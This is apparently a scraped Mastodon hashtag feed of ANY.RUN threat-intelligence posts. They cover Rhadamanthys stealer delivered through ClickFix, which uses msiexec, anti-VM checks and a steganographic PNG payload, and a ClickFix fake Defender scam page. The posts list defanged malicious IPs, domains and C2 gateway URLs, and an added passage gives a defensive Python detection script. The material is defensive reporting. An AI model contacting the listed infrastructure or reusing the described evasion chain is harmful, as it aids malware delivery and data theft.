social.wildeboer.net is one of the many independent Mastodon servers you can use to participate in the fediverse.
Mastodon instance for people with Wildeboer as their last name

#iocs

ANY.RUN<p><a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IOCs</span></a>:</p><p>File names &amp; directories:<br>Shields.msi</p><p>%USERPROFILE%\AppData\Local\Programs\Advanced PDF Shaper Ultimate\LdVBoxSVC.exe</p><p>C:\WINDOWS\system32\openwith.exe</p><p>URLs:<br>hxxps[:]//84.200[.]80.8/gateway/6caqmphx.fan5l<br>hxxps[:]//zerontwoposh[.]live/gateway/n5eepk7n.2a6s4</p><p><a href="https://infosec.exchange/tags/MITRE" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MITRE</span></a> Techniques:<br>Phishing (T1566)<br>User Execution: Malicious Copy and Paste (T1204.004)<br>System Binary Proxy Execution: Msiexec (T1218.007)<br>Virtualization/Sandbox Evasion: System Checks (T1497.001)<br>Hijack Execution Flow (T1574)<br>Obfuscated Files or Information: Steganography (T1027.003)</p>
ANY.RUN<p>🚨 How <a href="https://infosec.exchange/tags/Rhadamanthys" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Rhadamanthys</span></a> Stealer Slips Past Defenses using ClickFix<br>⚠️ Rhadamanthys is now delivered via ClickFix, combining technical methods and social engineering to bypass automated security solutions, making detection and response especially challenging.<br>👾 While earlier ClickFix campaigns mainly deployed <a href="https://infosec.exchange/tags/NetSupport" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>NetSupport</span></a> RAT or <a href="https://infosec.exchange/tags/AsyncRAT" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AsyncRAT</span></a>, this C++ infostealer ranks in the upper tier for advanced evasion techniques and extensive data theft capabilities.</p><p><a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> Sandbox lets SOC teams observe and execute complex chains, revealing evasive behavior and providing intelligence that can be directly applied to detection rules, playbooks, and proactive hunting.</p><p>🔗 Execution Chain:<br>ClickFix ➡️ msiexec ➡️ exe-file ➡️ infected system file ➡️ PNG-stego payload</p><p>In a recent campaign, the phishing domain initiates a ClickFix flow (<a href="https://infosec.exchange/tags/MITRE" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MITRE</span></a> T1566), prompting the user to execute a malicious MSI payload hosted on a remote server. </p><p>🥷 The installer is silently executed in memory (<a href="https://infosec.exchange/tags/MITRE" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MITRE</span></a> T1218.007), deploying a stealer component into a disguised software directory under the user profile.</p><p>The dropped binary performs anti-VM checks (T1497.001) to avoid analysis. 
</p><p>In later stages, a compromised system file is used to initiate a TLS connection directly to an IP address, bypassing DNS monitoring.</p><p>📌 For encryption, attackers use self-signed TLS certificates with mismatched fields (e.g., Issuer or Subject), creating distinctive indicators for threat hunting and expanding an organization’s visibility into its threat landscape.</p><p>🖼️ The C2 delivers an obfuscated PNG containing additional payloads via steganography (T1027.003), extending dwell time and complicating detection.</p><p>🎯 See execution on a live system and download an actionable report: <a href="https://app.any.run/tasks/a101654d-70f9-40a5-af56-1a8361b4ceb0/?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_term=120825&amp;utm_content=linktoservice" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/a101654d-70f</span><span class="invisible">9-40a5-af56-1a8361b4ceb0/?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_term=120825&amp;utm_content=linktoservice</span></a></p><p>🔍 Use these <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> TI Lookup search queries to track similar campaigns and enrich <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IOCs</span></a> with live attack data from threat investigations across 15K SOCs:<br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_content=linktoti&amp;utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522clickfix%255C%2522%2522,%2522dateRange%2522:180%7D" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span 
class="invisible">lookup?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_content=linktoti&amp;utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522clickfix%255C%2522%2522,%2522dateRange%2522:180%7D</span></a><br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_content=linktoti&amp;utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522rhadamanthys%255C%2522%2522,%2522dateRange%2522:180%7D" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_content=linktoti&amp;utm_term=120825#%7B%2522query%2522:%2522threatName:%255C%2522rhadamanthys%255C%2522%2522,%2522dateRange%2522:180%7D</span></a><br><a href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_content=linktoti&amp;utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522netsupport%255C%2522%2522,%2522dateRange%2522:180%7D" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_content=linktoti&amp;utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522netsupport%255C%2522%2522,%2522dateRange%2522:180%7D</span></a><br><a 
href="https://intelligence.any.run/analysis/lookup?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_content=linktoti&amp;utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522asyncrat%255C%2522%2522,%2522dateRange%2522:180%7D" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">intelligence.any.run/analysis/</span><span class="invisible">lookup?utm_source=mastodon&amp;utm_medium=post&amp;utm_campaign=rhadamanthys&amp;utm_content=linktoti&amp;utm_term=120825#%7B%2522query%2522:%2522(threatName:%255C%2522clickfix%255C%2522%2520OR%2520threatName:%255C%2522susp-clipboard%255C%2522)%2520AND%2520threatName:%255C%2522asyncrat%255C%2522%2522,%2522dateRange%2522:180%7D</span></a></p><p>👾 IOCs:<br>84.200[.]80.8<br>179.43[.]141.35<br>194.87[.]29.253<br>flaxergaurds[.]com<br>temopix[.]com<br>zerontwoposh[.]live<br>loanauto[.]cloud<br>wetotal[.]net<br>Find more indicators in the comments 💬</p><p>Protect critical assets with faster, deeper visibility into complex threats using <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> 🚀</p><p><a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a></p>
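As an added defender-side example (not ANY.RUN's code and not taken from the report above): a small Python triage script that runs over constructed process and network telemetry and flags the two stages of the chain described in the post, msiexec installing a package from a remote URL (T1218.007) and a TLS connection straight to an IP address with no DNS lookup. The sample events, hostnames and IPs are placeholders, not indicators from the campaign.

```python
import re
import ipaddress
from urllib.parse import urlparse

# Constructed sample telemetry (placeholders, not indicators from the report):
# process-creation command lines and TLS connection records with the SNI sent
# and whether the destination was reached via a DNS lookup.
PROCESS_EVENTS = [
    "msiexec.exe /i https://example.invalid/gateway/pkg.msi /qn",
    "msiexec.exe /i C:\\Users\\alice\\Downloads\\7zip.msi",
    "notepad.exe C:\\Users\\alice\\notes.txt",
]
NETWORK_EVENTS = [
    {"proc": "openwith.exe", "dst": "203.0.113.8", "port": 443, "sni": "", "dns_resolved": False},
    {"proc": "chrome.exe", "dst": "203.0.113.9", "port": 443, "sni": "example.com", "dns_resolved": True},
]

# Matches msiexec whether given bare or as a full path; case-insensitive.
MSIEXEC_RE = re.compile(r"(?:^|\\)msiexec(?:\.exe)?\s", re.I)
QUIET_FLAGS = {"/q", "/qn", "/quiet", "/qb", "/passive"}


def msiexec_remote_install(cmdline: str) -> bool:
    """True when msiexec installs a package fetched over HTTP(S) (T1218.007)."""
    if not MSIEXEC_RE.search(cmdline.strip()):
        return False
    return any(urlparse(tok).scheme.lower() in ("http", "https") for tok in cmdline.split())


def direct_ip_tls(ev: dict) -> bool:
    """TLS to a bare IP with no SNI and no DNS lookup: the DNS-bypassing C2 pattern."""
    try:
        ipaddress.ip_address(ev["dst"])
    except ValueError:
        return False  # destination was a hostname, not a raw IP
    return ev["port"] == 443 and not ev["sni"] and not ev["dns_resolved"]


def findings(proc_events=PROCESS_EVENTS, net_events=NETWORK_EVENTS) -> list:
    """Run both checks and return one human-readable finding per hit."""
    out = []
    for cmd in proc_events:
        if msiexec_remote_install(cmd):
            quiet = bool(QUIET_FLAGS & set(cmd.lower().split()))
            out.append(f"T1218.007 remote MSI install{' (quiet)' if quiet else ''}: {cmd}")
    for ev in net_events:
        if direct_ip_tls(ev):
            out.append(f"direct-to-IP TLS without DNS: {ev['proc']} -> {ev['dst']}:{ev['port']}")
    return out
```

A quiet-flag remote install from a user-facing process is the msiexec stage of the chain above; the bare-IP TLS check needs a telemetry source that records SNI and DNS resolution, so tune the field names to your EDR or NDR schema.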
ANY.RUN<p>🚨 New <a href="https://infosec.exchange/tags/ClickFix" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ClickFix</span></a> scam targets US users with fake MS Defender and Cloudflare pages.<br>⚠️ The scam page is hosted on a domain registered back in 2006, pretending to be the Indo-American Chamber of Commerce.<br>🎯 The <a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>phishing</span></a> page loads only for US-based victims, as observed during analysis with a residential IP in <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> Sandbox.</p><p>👨‍💻 Analysis session: <a href="https://app.any.run/browses/50395c46-41f5-4bb3-8205-61262ef4e63d/?utm_source=mastodon&amp;utm_medium=article&amp;utm_campaign=clickfix_scam&amp;utm_term=160425&amp;utm_content=linktoservice" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/browses/50395c46-4</span><span class="invisible">1f5-4bb3-8205-61262ef4e63d/?utm_source=mastodon&amp;utm_medium=article&amp;utm_campaign=clickfix_scam&amp;utm_term=160425&amp;utm_content=linktoservice</span></a></p><p>📍 URL: iaccindia[.]com<br>The page hijacks the full-screen mode and displays a fake “Windows Defender Security Center” popup.</p><p>🎭 It mimics the Windows UI, locks the screen, and displays urgent messages to panic the user.</p><p>Victims are prompted to call a fake tech support number (+1-…), setting the stage for further exploitation.</p><p>🎣 The phishing page may also display a fake Cloudflare message tricking users into executing a <a href="https://infosec.exchange/tags/malicious" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malicious</span></a> Run command.
<br>Take a look: <a href="https://app.any.run/tasks/e83a5861-6006-4b1d-aba8-8536dcaa8057/?utm_source=mastodon&amp;utm_medium=article&amp;utm_campaign=clickfix_scam&amp;utm_term=160425&amp;utm_content=linktoservice" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">app.any.run/tasks/e83a5861-600</span><span class="invisible">6-4b1d-aba8-8536dcaa8057/?utm_source=mastodon&amp;utm_medium=article&amp;utm_campaign=clickfix_scam&amp;utm_term=160425&amp;utm_content=linktoservice</span></a></p><p><a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>IOCs</span></a>: <br>supermedicalhospital[.]com <br>adflowtube[.]com <br>knowhouze[.]com <br>ecomicrolab[.]com <br>javascripterhub[.]com <br>virtual[.]urban-orthodontics[.]com </p><p>Streamline threat analysis for your SOC with <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> 🚀 <br><a href="https://infosec.exchange/tags/ExploreWithANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ExploreWithANYRUN</span></a></p>